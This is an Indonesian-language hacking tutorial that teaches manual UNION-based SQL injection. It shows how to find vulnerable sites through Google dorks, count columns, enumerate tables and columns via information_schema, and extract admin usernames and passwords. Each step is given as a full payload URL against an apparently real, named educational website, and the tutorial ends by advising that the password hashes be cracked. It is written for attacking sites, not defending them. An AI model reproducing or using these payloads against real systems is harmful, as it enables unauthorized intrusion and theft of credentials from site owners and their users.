Kali ini kami akan memberikan tutorial SQLi yang berbeda dari yang kemarin, karena kali ini anda harus mengetiknya sendiri. SQLi teknik manual ini juga ada tools add ons nya di firefox yaitu hackbar. Anda bisa unduh hackbar disini [ HACKBAR ] .
Baca Juga : Tutorial SQL Injection Mudah Menggunakan Havij
Mari simak tutorial berikut ini .
Bahan :
- Dork Sqli [ Disini ]
- Web yang vuln sqli [ Wajib ]
- Hackbar [ Gapake juga gapapa. ]
Ok, mari menuju Langkah -langkah nya.
Pertama, dorking di google setelah dapat webnya anda dapat men cek dengan menambah kan ' pada akhir value/angka. Jika setelah menambahkan ' muncul tanda error dari tampilan sebelumnya maka bisa di artikan web tersebut vuln.
http://www.mfc.edu/event.php?id=4
http://www.mfc.edu/event.php?id=4'
lalu anda tambahkan +order+by+1--+- dan web tersebut kembali normal. kita hitung tabel pada database yang ada pada web tersebut dengan menambahkan angka sampai web tersebut error.
http://mfc.edu/event.php?id=4'+order+by+1--+- [ OK ]
http://mfc.edu/event.php?id=4'+order+by+2--+- [ OK ]http://mfc.edu/event.php?id=4'+order+by+3--+- [ OK ]
http://mfc.edu/event.php?id=4'+order+by+4--+- [ OK ]
http://mfc.edu/event.php?id=4'+order+by+5--+- [ OK ]
http://mfc.edu/event.php?id=4'+order+by+6--+- [ OK ]
http://mfc.edu/event.php?id=4'+order+by+7--+- [ OK ]
http://mfc.edu/event.php?id=4'+order+by+8--+- [ OK ]
http://mfc.edu/event.php?id=4'+order+by+9--+- [ ERROR ]
Jika pada angka 9 terjadi error maka jumlah tabel pada database web tersebut ada 8.
Kemudian kita mencari angka ajaib yang ada pada web tersebut dengan menambahkan
" - " di depan angka (tanpa tanda petik)
" +union+select+ " setelah ' (tanpa tanda petik)
" 1,2,3,4,5,6,7,8--+ " jumlah tabel tadi (tanpa tanda petik)
http://mfc.edu/event.php?id=-4'+UNION+SELECT+1,2,3,4,5,6,7,8--+-
disini yang muncul adalah angka 2 dan 4, kita pilih salah satu. Untuk kali ini saya menggunakan angka 4 untuk print hasil.
kemudian pada angka tersebut kita ganti dengan " group_concat(table_name) " dan pada akhir angka yaitu angka 8 kita tambah dengan " +from+information_schema.tables+where+table_schema=database() "
http://mfc.edu/event.php?id=-4'+UNION+SELECT+1,2,3,group_concat(table_name),5,6,7,8+from+information_schema.tables+where+table_schema=database()--+-
disitu akan muncul nama - nama tabelnya yaitu : adminlogin,alumni,announcement,banner,contentpage,default,elearning,events,faculty,photocategory,photogallery dll.
Tahap selanjutnya kita cari nama tabel yang berhubungan dengan username & password admin. pada web ini nama table tersebut adminlogin. langkah selanjutnya pada angka ajaib tadi kita ganti menjadi " group_concat(columns_name) " dan hapus setelah angka 8 ganti dengan " from+information_schema.columns+where+table_name=CHAR() " lalu adminlogin kita rubah ke dalam bentuk desimal menggunakan tool ascii atau bisa klik DISINI. setelah di ubah dalam bentuk desimal maka akan tampil 97 100 109 105 110 108 111 103 105 110. angka desimal tersebut kita masukkan kedalam CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110). [Jangan lupa beri koma]
http://mfc.edu/event.php?id=-4%27+UNION+SELECT+1,2,3,group_concat(column_name),5,6,7,8+from+information_schema.columns+where+table_name=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+- => Tujuan nya untuk mengetahui kolom pada tabel tsb.
Maka akan muncul nama - nama kolom dan kita pilih untuk melihat data website dengan mengganti group_concat(column_name) dengan group_concat(username,0x3a,password) jangan lupa beri sela 0x3a pada kedua kolom. dan belakang 8 ganti dengan " +from+adminlogin " ( adminlogin <= nama tabel ).
http://mfc.edu/event.php?id=-4'+UNION+SELECT+1,2,3,group_concat(username,0x3a,password),5,6,7,8+from+adminlogin--+-
Nah, udah muncul data username dan password admin :)
Terkadang ada web yang menggunakan password md5/sha1 dll. maka harus di crack dulu. anda bisa mencari tool nya di google namanya MD5 Decrypt